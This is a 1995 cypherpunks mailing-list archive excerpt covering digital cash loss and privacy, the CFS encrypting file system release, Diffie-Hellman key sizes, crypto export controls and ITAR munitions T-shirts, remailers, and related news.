>if one's hard drive crashes was answered in the affirmative by Levy.
>
>But as I said, if the drive is backed up you don't lose it. It's my 
>understanding this is the case with the current Digicash/Twain bucks.  
>But not necessarily with all implementations.

you apparently didn't notice but there were some other posts on this
list about writing down the random seed that a person used to generate
the cash, and then being able to restore the cash somehow based on knowing
the random seed, however privacy is sacrified in this case apparently.
this with the Chaumian implementation, from what I understood.

if this is true, I wanted to point out in my post that this is a property
that real cash does not have. you cannot ever say to your bank from which
you withdrew cash, "oops, I lost a piece, could you replace it? also, if
someone spends the piece that I lost, tell them they can't?"

how would the bank handle a situation in which the consumer says, "oops,
my hard drive was compromised. all of the following cash was NOT spent
by me." notice this is precisely what happens with stolen credit cards today
all the time. the bank, if it was real cash, would have to say, "sorry,
you're out of luck. it's your responsibility to keep your cash secret".

or, the bank might say, "oh, well, that cash was not spent yet. we can issue
a replacement and bar the cash from being spent". this idea of "replacing"
cash is of course unique to the electronic realm. if the bank does it,
the consumer would be required to notify the bank before the cash is 
spent, again another unusual property unique to e-cash.

I would suggest to all companies developing e-cash that they print up
a carefully designed FAQ in which their cash properties 
are compared directly with parallel
properties of credit cards such as like the item above, because the
consumer is of course very familiar with credit cards. (this will be very
crucial for longterm customer education and acceptance imho. otherwise
the customer may make assumptions like, "since the cash comes on a card
it behaves like a credit card", etc.)

I would like to see someone elucidate what happens with lost Chaumian cash
in a detailed post (the oneliners I saw so far don't address the complexity 
and seriousness of this issue. this is a really significant issue with digital 
cash IMHO that will become very obvious once people who were used to the 
"mushiness" of credit card transactions switch to cash).
there seem to be many caveats with this "restoration".

one immediate problem I can imagine: the recent netscape bug showed
very well that a short random number generation process can be hacked.
so in other words, if the random numbers are short enough to write down,
it makes me wonder about the security of the cash generated from this
seed.

>This "lose your money" with digital cash really does seem to get to 
>people. I always point out that when you take $ out of an ATM machine, 
>you don't expect to get it back if you lose it.  For those forms of 
>e-money that are irretrevable when lost users are warned not to download 
>huge amounts. 

yes, it is clearly an emotional issue. the problem with a lot of technology
is that people are very emotional and irrational, and hyperactively so when it
comes to spending money. all marketing campaigns are designed to 
capitalize on this. various competitors can be tainted merely by
cheap psychological ploys that have no basis in fact. (the back and
forth between AT&T, MCI and Sprint and other competitors is an example
of the endless mudslinging, marginally based on reality, that can ensue.)

as I wrote in my earlier post, the key is to let people know of the weaknesses
in the product ahead of time so they are prepared. and the analogies that
you offer are precisely the kind the company can give to the customer to
make them feel more comfortable that "this stuff is more convenient than
real cash and not really any more dangerous". it's critical that they do
so ahead of time however, before the customer gets zapped by his own naivete.

>Question: will people's worries about losing their e-money lead them to 
>accept a higher degree of tracibility as a tradeoff?  

that's exactly the issue I tried to raise in my post, unfortunately perhaps in
not the crisp way you do here. (of course, you're the one that makes a living
off your prose, heh.)

one can see advertising as a kind of yin/yang game. you have to imagine
that if your competitor says, "gosh, you could lose cash with so-and-so's
system", you can always reply "yes, but you retain privacy-- can you do
that with so-and-so's system"?  digital cash is not a panacea. it is
in fact a design compromise that simply applies more importance to
various aspects of transaction capabilities: ease of use, privacy, etc.

checks and cash are at two ends of the economic transaction spectrum.
in contrast to other cypherpunks I don't really see either as intrinsically
superior to the other. many businesses may *never* end up using digital
cash in certain transactions (i.e. with other companies, not individual
buyers) for traceability reasons. it seems to me
there are many agreements in which hiding the identity of one or both
parties is simply intrinsically unacceptable to both, and no amount of
handwaving smoke-and-mirrors appeals to magic "reputation agencies" will
completely alleviate this.

so my bottom line is that I think digital cash is going to become a
very, very important part of the future economic ecology, but it will
coexist with other methods. it may very well become the dominant method,
but I suspect there will be significant areas of commerce that actively
resist digital cash technology out of the preferences of all parties.

something the hardcore cypherpunks in general fail to consider, that was 
brought out in a great article in the WSJ about the counterfeit 
$100 superbills circulating:
the cash aspects of the global economy are negligible in comparison to
"identified" transactions such as through credit and checks. (hence the
treasury's lukewarm approach to stopping counterfeiting, which scares
the willies out of me personally). there is absolutely an *enormous*
dedication to "identified" transactions in the world today, and cypherpunks
seem to me to be somewhat misguided in the ways they exalt cash.

it is true that cash is the medium of choice for the individual, but the
vast majority of economic transactions are *not* made by the individual
in virtually any civilized society. digital cash may change this slightly,
but not significantly, I suspect. businesses exchange money as part of
complex agreements and contracts in which liability is a key ingredient.
liability is an exceedingly problematic issue with digital cash. if anyone
is going to create a widespread cash economy based on total anonymity
they have an uphill battle easily far more difficult than Chaum has
encountered so far. (remember Chaum only implements "semi-anonymity", 
anonymity on payer side but not payee side).

--

anyway, congrats on the fine article SL. you get my "honorary 
cypherpunk of the week" award for the article <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@carfax.ims.advantis.com>
Date: Sat, 28 Oct 1995 02:52:51 +0800
To: WOOD@VAX2.ROCKHURST.EDU
Subject: Re: e-mail, business and privicy
In-Reply-To: <01HWXJ7WNGYA000F24@VAX2.ROCKHURST.EDU>
Message-ID: <Pine.A32.3.91.951027140228.14059A-100000@gandalf.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 27 Oct 1995 WOOD@VAX2.ROCKHURST.EDU wrote:

> An old subject, but could someone please give me a pointer 
> to the legalities of reading other peoples mail in the working 
> environment.

There is a new O'Reilly book out called _Computer Crime_ that covers the
entire arena in more detail than you'll be likely to ever need.  I hope.

It's decidedly oriented towards the law enforcement community, not
"Computer Folk". Though the title focuses on crime, you'll find what 
you need here. 

===========================================================================
     Henry W. Farkas      |     Me?     Speak for IBM?     Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://www.ims.advantis.com/~hfarkas
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Not to worry, we'll just outlaw all unlicensed cryptography.  After all, it
works in France. You don't see weekly terrorist attacks over there any more
now do you ?             - futplex@pseudonym.com -
===========================================================================


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMJEgFqDthkLkvrK9AQF6ygP/VdVcox7kvuW7SWZsnHR2QddZuO0Xp60U
Y6VXMR56WwW8EPyJ4iTvIZ44Nqnt8XshQN22ZVLNQopb3uRpY+MQR68scm6YPBt/
4U+VvgOOopfHKTdJSpqJy8n4M1Y5o1UVnAUIL8oNUhQId55BvFK1GzdtsPRqZLYj
58SLD0+ub3U=
=EoR7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 28 Oct 1995 03:16:34 +0800
To: cypherpunks@toad.com
Subject: QUB_ity
Message-ID: <199510271832.OAA25016@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   CJL has provided the Oct 13 Science article on "Quantum
   Computation," by David DiVincenzo of IBM Research, as
   summarized by the post of October 23.


   QUC_omp  (53 kb in three parts)

   (Math flubs by this ibm-qubity)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 28 Oct 1995 04:52:06 +0800
To: Matt Blaze <mab@research.att.com>
Subject: Re: New release of CFS Unix encrypting file system available
In-Reply-To: <9510271856.AA24314@merckx.info.att.com>
Message-ID: <199510271954.PAA20647@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze writes:
>CFS pushes encryption services into the Unix(tm) file system.  It
>supports secure storage at the system level through a standard Unix
>file system interface to encrypted files.  Users associate a
>cryptographic key with the directories they wish to protect.  Files in
>these directories (as well as their pathname components) are
>transparently encrypted and decrypted with the specified key without
>further user intervention; cleartext is never stored on a disk or sent
>to a remote file server.  CFS employs a novel combination of DES
>stream and codebook cipher modes to provide high security with good
>performance on a modern workstation.  CFS can use any available file
>system for its underlying storage without modification, including
>remote file servers such as NFS.  System management functions, such as
>file backup, work in a normal manner and without knowledge of the key.

What happens to hard links?

mkdir foo bar
CFS_set_directory_key -directory ./foo -key foo-key
CFS_set_directory_key -directory ./bar -key bar-key
cp /etc/passwd ./foo/test1
ln ./foo/footest ./bar/bartest
cmp ./foo/footest ./bar/bartest




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Sat, 28 Oct 1995 03:19:49 +0800
To: cypherpunks@toad.com
Subject: New release of CFS Unix encrypting file system available
Message-ID: <9510271856.AA24314@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Source code for the latest version (release 1.3.1) of CFS, the Cryptographic
File System, is now available upon request for research and experimental
use in the US and Canada.

CFS pushes encryption services into the Unix(tm) file system.  It
supports secure storage at the system level through a standard Unix
file system interface to encrypted files.  Users associate a
cryptographic key with the directories they wish to protect.  Files in
these directories (as well as their pathname components) are
transparently encrypted and decrypted with the specified key without
further user intervention; cleartext is never stored on a disk or sent
to a remote file server.  CFS employs a novel combination of DES
stream and codebook cipher modes to provide high security with good
performance on a modern workstation.  CFS can use any available file
system for its underlying storage without modification, including
remote file servers such as NFS.  System management functions, such as
file backup, work in a normal manner and without knowledge of the key.

CFS runs under SunOS and several other BSD-derived systems with NFS.
It is implemented entirely at user level, as a local NFS server
running on the client machine's "loopback" interface.  It consists of
about 5000 lines of code and supporting documentation.  You must have
"root" access to install CFS.

CFS was first mentioned at the work-in-progress session at the Winter
'93 USENIX Conference and was more fully detailed in:

    Matt Blaze. "A Cryptographic File System for Unix", Proc. 1st ACM
    Conference on Computer and Communications Security, Fairfax, VA,
    November 1993. (PostScript available by anonymous ftp from
    research.att.com in the file dist/mab/cfs.ps.)

and in

    Matt Blaze. "Key Management in an Encrypting File System", Proc.
    Summer '94 USENIX Tech. Conference, Boston, MA, June 1994.
    (PostScript available by anonymous ftp from research.att.com
    in the file dist/mab/cfskey.ps.)

Version 1.3 of CFS also includes ESM, the Encrypting Session Manager.
ESM provides shell-to-shell encrypted sessions across insecure links
and requires no OS or network support.  It is useful for typing cfs
passphrases when logged in over the network.  ESM needs RSAREF 2.0 to
compile and is tested only on SunOS and BSDI.  ESM is the first released
part of a suite of session encryption tools that are described in

    Matt Blaze and Steve Bellovin. "Session-layer Encryption."
    Proc. 1995 USENIX Security Workshop, Salt Lake City, June 1995.
    (PostScript is available from
    ftp://research.att.com/dist/mab/sesscrypt.ps)

The new version of CFS differs from the version described in the
papers in a few ways:

* The DES-based encryption scheme has been strengthened, and now
provides greater security but with the online latency of only single-DES.

* Support for the smartcard-based key management system is not
included and a few of the tools are not included.

* An impoved key management scheme now allows chaning the passphrase
associated with a directory.

* The performance has been improved.

* The security of the system against certain non-cryptanalytic attacks
has been improved somewhat. 

* User-contributed ports to a number of additional platforms.

* Hooks for adding new ciphers.

* 3-DES, MacGuffin, and SAFER-SK128 encryption options.

* Timeout options allow automatic detach of encrypted directories
after a set time or period of inactivity.

CFS is distributed as a research prototype; it is COMPLETELY
UNSUPPORTED software.  No warranty of any kind is provided.  We will
not be responsible if the system deletes all your files and emails the
cleartext directly to the NSA or your mother.  Also, we do not have
the resources to port the software to other platforms, although you
are welcome to do this yourself.  The software was developed under
SunOS and BSDI, and there are also unsupported user-contributed ports
available for AIX, HP/UX, Irix, Linux, Solaris and Ultrix.  We really
can't promise to provide any technical support at all, beyond the
source code itself.  We also maintain a mailing list for CFS users and
developers; subscription information is included with the source code.

Because of export restrictions on cryptographic software, we are only
able to make the software available within the US and Canada to US and
Canadian citizens and permanent residents.  Unfortunately, we cannot
make it available for general anonymous ftp or other uncontrolled
access, nor can we allow others to do so.  Sorry.

Legal stuff from the README file:

 *              Copyright (c) 1992, 1993, 1994, 1995 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * This software is subject to United States export controls.  You may
 * not export it, in whole or in part, or cause or allow such export,
 * through act or omission, without prior authorization from the United
 * States government and written permission from AT&T.  In particular,
 * you may not make any part of this software available for general or
 * unrestricted distribution to others, nor may you disclose this software
 * to persons other than citizens and permanent residents of the United
 * States and Canada. 
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.

If you would like a copy of the CFS source code, please read to the end
of this message and then send email to:

	cfs@research.att.com

DO NOT REPLY DIRECTLY TO THIS MESSAGE.  You must include a statement
that you are in the US or Canada, are a citizen or legal permanent
resident of the US or Canada, and have read and understand the license
conditions stated above.  Be sure to include an email address in a US-
or Canada-registered domain. The code will be sent to you via email in
a "shar" shell archive (a little over 300K bytes long).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bluebird@alpha.c2.org
Date: Sat, 28 Oct 1995 06:33:55 +0800
To: cypherpunks@toad.com
Subject: Need Mail-to-News gates
Message-ID: <199510272159.OAA06298@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Could someone PLEASE netmail me some _known reliable_ gates that use the
straight netmail address format (alt.whatnot@bosco.kollege.edu)?

All of the old reliables are shut down and none of the ones listed in
the last remailer helpfile I got work either:

group.name@news.demon.co.uk
group.name@dispatch.demon.co.uk
group.name@bull.com
group.name@cass.ma02.bull.com
group.name@paris.ics.uci.edu
group.name@crs4gw.crs4.it
group.name@berlioz.crs4.it
group.name.usenet@canaima.Berkeley.EDU

NONE of these work, or were nonfunctional when I tested them, anyway.

I use the other gates like mail2news@utopia.hacktic.nl with the
Newsgroups: field format, but the straight address format is useful for
some other purposes.

Thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sat, 28 Oct 1995 06:40:18 +0800
To: cypherpunks@toad.com
Subject: Re: newsweek oct 30 Levy digital cash article
Message-ID: <v02120d08acb716a45144@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Vlad the Inhaler writes:
>
>you apparently didn't notice but there were some other posts on this
>list about writing down the random seed that a person used to generate
>the cash, and then being able to restore the cash somehow based on knowing
>the random seed, however privacy is sacrified in this case apparently.
>this with the Chaumian implementation, from what I understood.
>

I would not say that privacy is "sacrificed" if, in fact, Digicash
has implemeneted this "write down the original random seed" backup
method. Worst case scenario -- you write down the seed, and when the
police break down your door, they find that you've written it down.
Well, if things have progressed to that point, you're in pretty
serious trouble anyhow, and if you're expecting this to happen you
have a simple remedy -- back up & encrypt your wallet rather than
writing the seed down. Or, put the seed in a little text file,
encrypt the text file, and back it up.

I suspect, however, that this means that the Digicash wallet doesn't
pick up new bits of entropy to "groom" it's random state. Also, it
was unclear where this state came from, but it's hopefully not just
text entered by the user. (I could see getting the state from something
like keystrokes or mouse clicks, then having the user write down a
checksummed, error-corrected string as a preferred alternative.)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 28 Oct 1995 07:30:20 +0800
To: cypherpunks@toad.com
Subject: groupware position available in Boston
Message-ID: <199510272309.QAA16720@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I recently got word of an interesting groupware development position
in Boston that someone here may be able to benefit from. feel free
to pass on this info.

(contrary to some here who are not impressed with groupware application
potential, in my estimation groupware is soon going be a key "killer app" 
in cyberspace, perhaps the "next" one after Netscape, driving key 
technological advancement in network & software development...  in my
opinion virtually every significant and valuable aspect of the internet
can be boiled down into a subset of the functions of groupware.)

===

From: mike@kni.mv.com (Mike Hren)

...
We are starting a company called Emergent
Systems and are looking for technical partners to help turn our vision into
reality.

We're developing a meta-groupware application that seeks to accelerate the
learning of a workgroup. Called a Discovery Acceleration System, the idea
is to use a text engine to synthesize the collective email dialogue
(voicemail later) of a workgroup into its core concepts (Concept Map) that
can be visualized, hypertext linked to related information sources, and
used as a prioritizer of unsolicited email based on conceptual relevance.
Just as knowledge is born of chaos, this Concept Map emerges from the
workgroup's daily interaction--as opposed to being externally defined by a
static knowledge base.

In a dynamic sense, since the Concept Map is used as a distributed Linker
and Lens between workgroups, it also enables a system of interaction to
emerge at the organizational level.

We are looking for someone with software development experience, and
interest in information retreival, data visualization, groupware, or
messaging systems. Since most of the components of this system are
commercially available, integration is more important than theoretical
development.  Also, a desire to be part of a start-up effort is a must.

....

If you or anyone you know might be
interested, please email a resume and description of interest.  Thanks for
your time.

Mike Hren
President
Emergent Systems, Inc.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 28 Oct 1995 01:23:45 +0800
To: cypherpunks@toad.com
Subject: TWP Ups Net Freedom
Message-ID: <199510271518.QAA21481@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



The Washington Post, October 27, 1995


Freedom of Net Speech (Editorial)

Is speech on the Internet like speech in a public square,
or is it more like speech in a privately owned mall,
where leafleters and demonstrators need permission? And
what about universities, where students using university
accounts for e-mail and other messages may find
themselves subjected to disciplinary rules? The latter
problem occurred most recently at Virginia Tech, which
has come under challenge for disciplining a student who
sent a letter described as abusive to another student.

The difficulty of framing such questions or even of
defining the terms they're made up of (Is cyberspace
really a "space," or just the ability of a lot of
machines to talk to one another?) should be ample
illustration of why millions of Internet users are still
sloshing around in a state of legal ambiguity. And that
ambiguity, though congenial to the anarchically inclined
folks who have been in cyberspace since its
not-very-remote beginnings, can't be sustained much
longer as millions of users pile into cyberspace through
commercial, university-owned and workplace hookups. The
providers of these hookups all have an interest in what
their users "say" to other users once they're on line,
but the interests vary. Some providers are afraid -- with
cause -- that they may be liable for pirated, libelous or
other lawbreaking material posted on their accounts, or
(depending on the outcome of assorted legislation) for
transmitting pornographic or indecent material to minors.
Universities have another set of motivations that go
beyond fear of legal vulnerability and that have led many
-- including Virginia Tech -- to institute student
conduct policies that can be used to curb even
non-cyberspace speech.

Virginia Tech authorities say the existing student life
policy prohibits "words or acts" that constitute "abusive
conduct" that "demeans, intimidates, threatens or
otherwise interferes with another person's rightful
actions or comfort," whether on line or off. As with the
notorious "hate speech" regulations at many campuses,
this is a dangerously broad category, though the lines
between interfering with someone's comfort and actually
threatening him are probably drawable by a court.

Technologically oriented civil liberties groups such as
the Electronic Frontier Foundation have been arguing for
some time that if First Amendment rights in cyberspace
aren't codified and nailed down early, tendencies toward
restraint will multiply to cover more and more of the new
"sectors," and this will greatly reduce the potential of
electronic communication both socially and commercially.
An even more cold-eyed pragmatic argument is that speech
restrictions, notoriously hard to enforce in the real
world, are even more so in the virtual one: In one
formulation much repeated by programmers, the Internet
"interprets censorship as a malfunction and detours
around it." Add this to the practical impossibility of
commercial owners monitoring every message sent via
cyberspace, and you have enforcement nightmares. There
are better and broader arguments, though, for being
skeptical of any efforts to restrict the content of
cyberspace speech in ways that go beyond existing and
permitted controls on real-world speech, whether on child
pornography, stalking, libel or the rest.

Universities have some wiggle room here, but for the same
reason university "hate speech" codes or restrictions on
what professors may say in class are a terrible idea,
it's bad practice to restrict student speech on-line.
Free speech is good for the Internet for the same reasons
it's good for the real world.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Sat, 28 Oct 1995 01:41:34 +0800
To: cypherpunks@toad.com
Subject: Diffie-Hellman Key Generation
Message-ID: <Pine.3.89.9510271616.A410-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone know of software available outside the US for generating 
large (1024-bit or more) Diffie-Hellman keys ? The default key for CTCP 
is only 512 bits, and I'd like to be able to give out some larger keys 
(e.g. 1024 and 2048 bits) so that people have a choice of the level of 
security that they want to use.

Alternatively, does anyone have any pre-generated large keys that I can 
put in there ?

Finally, I'm basing this on comments in 'Applied Cryptography' that D-H
keys should be at least 512 bits and preferably 1024. How does the
difficulty of breaking a D-H exchange with a 512 bit key compare to
breaking a 512 bit RSA key ? 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 28 Oct 1995 06:02:28 +0800
To: cypherpunks@toad.com
Subject: Rabin Patents.
Message-ID: <9510272053.AA28938@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Anyone know who is currently claiming Patent rights over the 
Rabin public key encryption and signature schemes? Is it RSADSI
or Cylink ... or both?

	Phill 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Sat, 28 Oct 1995 02:08:35 +0800
To: cypherpunks@toad.com
Subject: Re: Linux security issues
Message-ID: <Pine.3.89.9510271651.A410-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Oct 1995, Bill Frantz wrote:

> However, the pass phrase is not the only dangerous information. 
> Intermediate forms used for decrypting the RSA private keys, and the
> decrypted RSA private keys also have to be protected.  The logic of PGP
> requires that it keep at least one of these around for a long time, so it
> will probably be written to swap space.

Couldn't you use mmap() to map a disk file into your address space, keep 
all your secret data in that part of the address space, and then 
carefully wipe that file before exiting ?

I guess you'd then have the problem that people could just read that file
(if they had the priviledges to do so) to find all the secret data rather
than having to trawl through the swap file though.. and you'd still have
to worry about disk buffering. So it probably wouldn't be a big
improvement. 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Sat, 28 Oct 1995 01:26:09 +0800
To: cypherpunks@toad.com
Subject: FTP export walls
In-Reply-To: <199510271446.KAA13555@jekyll.piermont.com>
Message-ID: <Pine.HPP.3.91.951027164036.27129A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



>Perry E. Metzger wrote:

>> Michael Froomkin writes:

> > If anyone from MIT is reading this, it would be a real public service to 
> > put on a web site (a) what the system used for the release of PGP is 
> > exactly and (b) what assurances (oral, written, names & dates) was 
> > received from State/Commerce that this was legal.

> I don't think they got any sort of approval from State or Commerce --
> I think they just discussed it with their own lawyers.

Last July *hobbit* (hobbit@avian.org) presented to this list a
description of "The FTP Bounce Attack" and stated that it's trivial to
hack past a defense like this (well, it didn't seem trivial to me, but
I'm not a unix wizard). Obviously, there is no real need for such attacks
with PGP and 'everything' else available at non-US sites, and I guess it
would leave traces? But it would be interesting to know if anybody have
successfully tried it at MIT or some other export-restricted FTP site.

Mats






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Sat, 28 Oct 1995 07:35:28 +0800
To: cypherpunks@toad.com
Subject: POINTER: The Money Laundromat
Message-ID: <199510272248.SAA32101@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


J. Orlin Grabbe's essay, "The Money Laundromat", as published in the
November 1995 issue of Liberty, was sent to me via e-mail by someone
who prefers to remain anonymous. After checking for accuracy against
my own hard copy, I have posted it to the following Usenet newsgroups:

alt.security.pgp
alt.society.sovereign
alt.society.anarchy
talk.politics.crypto

I will be making this article available on my Web page shortly as well.
The article covers both the threat and the promise of digicash, with
much detail devoted to electronic surveillance and financial tracking
via PROMIS software. This single paragraph summarizes rather well:


"...the coming battle over financial footprints is inevitable, and perhaps
inevitably bloody. But in the end it is the money laundering regulations that
will have to go. For one thing, advances in the technology of anonymity are
putting financial privacy within the reach of everyone. For another, there is
a growing awareness that the existing laundering statutes have little or no
effect on terrorism or drug-dealing, but instead are related to an upswing in
government-sponsored harassment of targeted political groups."

-- 
http://yakko.cs.wmich.edu/~frogfarm  ..for the best in unapproved information
 S..O).... The statist wields a bad law! -- More --
 @.../.".. You quickly protect your money pouch! -- More --
 .$*...].. The statist vanishes in a puff of smoke. "Greedy bastard!"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sat, 28 Oct 1995 07:38:28 +0800
To: cypherpunks@toad.com
Subject: DigiCrime web page
Message-ID: <199510272320.XAA29752@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Arjen Lenstra's startup, DigiCrime, full service criminal computer
hacking organization now has a web presence, thanks to to the efforts
of its theif scientist, Kevin McCurley.

http://www.digicrime.com/

-matt blaze, president of vice





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Sat, 28 Oct 1995 04:23:21 +0800
To: stripes@va.pubnix.com
Subject: Re: CJR returned to sender
Message-ID: <10401.9510271935@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Josh Osborne <stripes@va.pubnix.com> writes on cpunks:
> [...]
> 
> (Also we may find a better quality shirt printer and actually be
> able to print readably not only CODE128 barcodes, but some of the
> more advanced encoding methods that store as much as 40K a page...
> how big is the PGP source?)

Well the DOS PGP.EXE binary should do (no need for source, as it is
uses keysizes greater than allowed by ITAR already, so ability to
increase key sizes is not required for ITAR applicability).  It's 94k
pkzipped.  Front and back print on a T-shirt would give you 80k.  You
could probably tweak something to get it on a shirt.  Dunno if it
would read printed on a shirt.

It would be fun to see what it looked like a sheet of paper tho'.

Anyone happen to have code to do some of these 2d barcoding things?
Or are they all proprietry?

> >If the CJR for the t-shirt is ultimately denied, ditto?
> 
> That would be much better.  More free publicity.  An example of how
> impossabble it is to enforce the ITAR that anyone should be able to
> understand.

Yeah, I think that would be good anti-ITAR publicity.

> >The t-shirt joke is unlikely to help. (For all those who commented that
> >wearing the munitions shirt is rilly, rilly kool, I say "Great!" Wear it in
> >the mosh pits, just lie to people about how the t-shirt "has been
> >classified as a munition." It hasn't been as of this writing.)
> 
> [...]
> 
> (and yeah it is a shame the shirt actually says "has been classified",
> I had thought I said "qualifyes as a" which would have been correct -
> but that may just be my revisionest memory kicking in)

The wording on the shirts are: "...is a munition" and "...is
classified as a muntion".  Is that what you meant, that "this shirt is
a muntion" is misleading?

The "has been classified" was wording that Don Henson used in his
earlier ads, but did not appear on any of the shirts (AFAIK).

Joel Furr's shirt says:

 THIS SHIRT IS A MUNITION


Don Henson's says:

     WARNING
    THIS SHIRT 
       IS A 
     MUNITION 


My shirts say:

                WARNING
THIS SHIRT IS CLASSIFIED AS A MUNITION AND
   MAY NOT BE EXPORTED FROM THE UNITED
  STATES, OR SHOWN TO A FOREIGN NATIONAL


I think Raph sent them one of Joel's, so it says "this is shirt is a
munition", rather than "...has been classified...".  Perhaps some
people think that this too is inaccurate?

Adam
--
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)

Munitions T-shirts: http://www.obscura.com/~shirt/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 28 Oct 1995 16:00:11 +0800
To: cypherpunks@toad.com
Subject: SSL Remailer interface w/premail
Message-ID: <199510280713.AAA18017@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


https://www.c2.org/remail/by-www.html

	Note that this uses SSL and that messages are encrypted using
premail -- the entire remailing chain is not in the clear
anymore. This is still a single point of failure system, but secure
against attacks which do not involve the compromise of c2.org. (Unlike
the non-encrypting one on http://www.c2.org/remail/by-www.html)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc@cygnus.com>
Date: Sun, 29 Oct 1995 13:09:29 +0800
To: Alan Patterson <khijol!tanju.wsnet.com!lep@cygnus.com>
Subject: Re: Need Mail-to-News gates
In-Reply-To: <Pine.LNX.3.91.951027175407.19464A-100000@tanju.wsnet.com>
Message-ID: <Pine.3.89.9510280101.A1036-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Oct 1995, Alan Patterson wrote:

> On Fri, 27 Oct 1995 bluebird@alpha.c2.org wrote:
> 
> > Could someone PLEASE netmail me some _known reliable_ gates that use the
> > straight netmail address format (alt.whatnot@bosco.kollege.edu)?
> 
> If someone will direct me to sources, I'll try and setup a gate. (We use 
> INN).

Why not take the easy way out - set up an alias in /usr/lib/aliases to 
run inews on the incoming email?
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc@uunet.uu.net>
Date: Sun, 29 Oct 1995 13:01:14 +0800
To: cypherpunks@toad.com
Subject: 1995-10-27 Members Named to Nat Security Telecom Committee (fwd)
Message-ID: <Pine.3.89.9510280157.B1036-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Fri, 27 Oct 1995 20:11-0400
